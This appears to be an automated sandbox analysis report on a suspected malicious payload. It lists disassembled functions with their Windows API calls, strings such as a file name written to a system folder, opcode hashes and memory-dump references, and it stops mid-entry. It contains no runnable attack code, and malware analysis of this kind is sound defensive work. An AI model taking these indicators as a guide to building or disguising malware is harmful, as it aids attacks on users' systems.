                                                                                                  • Opcode ID: aa6198532dfe89d617c37d6c40312885d90fc2907727b5414434f20f08577f91
                                                                                                  • Instruction ID: 9081c322963befa2921969b222935820f7f0c10839b0db2791c075d226ec47f2
                                                                                                  • Opcode Fuzzy Hash: aa6198532dfe89d617c37d6c40312885d90fc2907727b5414434f20f08577f91
                                                                                                  • Instruction Fuzzy Hash: 5E11C831501E156BEB223B769C05AAB7FDCFF417A4F10187AFD05DB541FA259E0142E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  • Opcode ID: 3824c278a1652ed6beb7183405d1c378e4ecaed720e9f421173b8635a24cf681
                                                                                                  • Instruction ID: 0040a9c0540f1feac995dc5228ecae64d15c5d348999cfaa00a142e61524a13a
                                                                                                  • Opcode Fuzzy Hash: 3824c278a1652ed6beb7183405d1c378e4ecaed720e9f421173b8635a24cf681
                                                                                                  • Instruction Fuzzy Hash: D7218B76A043113BE721AA226C01FBB7B99DFC279DF04442AFE50673C6D625DD0542BA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 004AB70B
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(01320000,00000000,00000001,00000001,?,?,?,004A0E81,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490CA5
                                                                                                  • _free.LIBCMT ref: 004AB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: 4f5f9d6d3f95437b0c898ce19de2e155ab323e8767a609d86a16ed664df64d82
                                                                                                  • Instruction ID: f923bcbe9cadef7beb4537052eef355ff25369393a196cc19070e869d351becf
                                                                                                  • Opcode Fuzzy Hash: 4f5f9d6d3f95437b0c898ce19de2e155ab323e8767a609d86a16ed664df64d82
                                                                                                  • Instruction Fuzzy Hash: AF11E736405615AFCF213BB1AC44A6E3F84EF66364F20013BF844AA252DB7C88409BDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0048F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0048F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 3f243b0d26e58f5f3ba20213839f2aa98909e6f44cd6d4eaf36903b79790382c
                                                                                                  • Instruction ID: b6469a28ca4085c8056c2aa50c4685685910362859727b88efc7973d37eae72c
                                                                                                  • Opcode Fuzzy Hash: 3f243b0d26e58f5f3ba20213839f2aa98909e6f44cd6d4eaf36903b79790382c
                                                                                                  • Instruction Fuzzy Hash: 3A01DB356403087AE730AB55DC4AF9A3B6CE754B00F504421FE00BB2D1D7B5A50DDBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0048E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0048E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 6214c8344354e336e591dc17259fce7100f2cd95ab1d10c5d24ee728677750c0
                                                                                                  • Instruction ID: 19e183a8de9bd92e60d020e316fef7ddceef12d56baec79f6ab43168caaa0402
                                                                                                  • Opcode Fuzzy Hash: 6214c8344354e336e591dc17259fce7100f2cd95ab1d10c5d24ee728677750c0
                                                                                                  • Instruction Fuzzy Hash: CF012B3574030976E7209B91DC46FAA7B6DE754B04F100411FA00BB2D1D6F5A50DD794
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0048FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0048FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction ID: cf70c6f8c64a497a84a4b7b029e593fccace6d0bc8054abda18f81c79f96c2fe
                                                                                                  • Opcode Fuzzy Hash: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction Fuzzy Hash: 9A018631B40309B7EB20AB55DC4AFAB3F6CAB44B10F544461FA04BE2D1D7E5A80997A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0048FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0048FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction ID: b141627ab45cfb6d68749b0bc855ab6320ae8320df33bb022b6c6fee711a6480
                                                                                                  • Opcode Fuzzy Hash: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction Fuzzy Hash: 1A016231A40308A6EB206B959C8AFAB3F6DAB44B01F144461FA00AE2D1D7F5A80997A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 42d397a9891470c945f3bf6972cb753c4b972b4a1be913ae5db83c64259e514b
                                                                                                  • Instruction ID: a8f658decdf11d94af4796d2016ec87855b46f6ccbac96852890de40adf88064
                                                                                                  • Opcode Fuzzy Hash: 42d397a9891470c945f3bf6972cb753c4b972b4a1be913ae5db83c64259e514b
                                                                                                  • Instruction Fuzzy Hash: B751C1317081049BDB24EE1CD99096E7BA6EF85314B348D2EF855CB341D735EC518BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                  • String ID: H
                                                                                                  • API String ID: 3115901604-37590417
                                                                                                  • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                  • Instruction ID: 360db3b3f9d1bcaa81f69801ea6367dbe9c3248901938e0c44b1d7d3b45cf2e0
                                                                                                  • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                  • Instruction Fuzzy Hash: AA41B672701606BFDF288E69CA805AF7FA5BF45360B14813FE41587244D6F8DD418B58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b3d5f524b9b2ceb316d065495c93b3be23c178b3ed05a6ae5ab5851ceb5c38a0
                                                                                                  • Instruction ID: de30bbb3f2d6c48986f2a2db32899b984c2423ca4678dcb0641384199605a8e4
                                                                                                  • Opcode Fuzzy Hash: b3d5f524b9b2ceb316d065495c93b3be23c178b3ed05a6ae5ab5851ceb5c38a0
                                                                                                  • Instruction Fuzzy Hash: 9531F431304205ABDB28FE4CDC8982E77A6EBC17547204E5EF865CB781D739ED418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7M
                                                                                                  • API String ID: 2102423945-4023654100
                                                                                                  • Opcode ID: 1d126440b06c0aa3485298ade1bd764c52ce5dc615011ef11ff83d5273574384
                                                                                                  • Instruction ID: b7baead0845f535126154fdbaedc6886efee2773554295b194577d6e40d46a0f
                                                                                                  • Opcode Fuzzy Hash: 1d126440b06c0aa3485298ade1bd764c52ce5dc615011ef11ff83d5273574384
                                                                                                  • Instruction Fuzzy Hash: 092125B9B442213BE6406668FC92F56B399EB94B18F00402FF609D72C1D2A4AC10C6D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • UuidCreate.RPCRT4(?), ref: 0047C5DA
                                                                                                  • UuidToStringA.RPCRT4(?,00000000), ref: 0047C5F6
                                                                                                  • RpcStringFreeA.RPCRT4(00000000), ref: 0047C640
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0047C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: 7c6d1fe6fb3e36e23a48b673c657d05bdc23a878245dce7193f397d3d581505e
                                                                                                  • Instruction ID: f4e5c2a40aee3d92799e37f9565094377afd15baf5805e77ed1dd5c755e20e8f
                                                                                                  • Opcode Fuzzy Hash: 7c6d1fe6fb3e36e23a48b673c657d05bdc23a878245dce7193f397d3d581505e
                                                                                                  • Instruction Fuzzy Hash: 7A21DA71104301ABD710DF24D84479BBBE8AB81758F008E6FF48993251D7799548C796
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: b7dc18aaefc6a67a1c4cd9ef9d8880427412eed7c7540bb580e69e9c3bc74c55
                                                                                                  • Instruction ID: 9a7c3e67f8ba65160695a491d69174d84095aaa12ade839ffe9e21d7ad901bd0
                                                                                                  • Opcode Fuzzy Hash: b7dc18aaefc6a67a1c4cd9ef9d8880427412eed7c7540bb580e69e9c3bc74c55
                                                                                                  • Instruction Fuzzy Hash: D801FE72A8022833DD306965AC47FEB7B6CDB62721F0000ABFE08D7141D5E5594557D1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0048BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0048BA73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
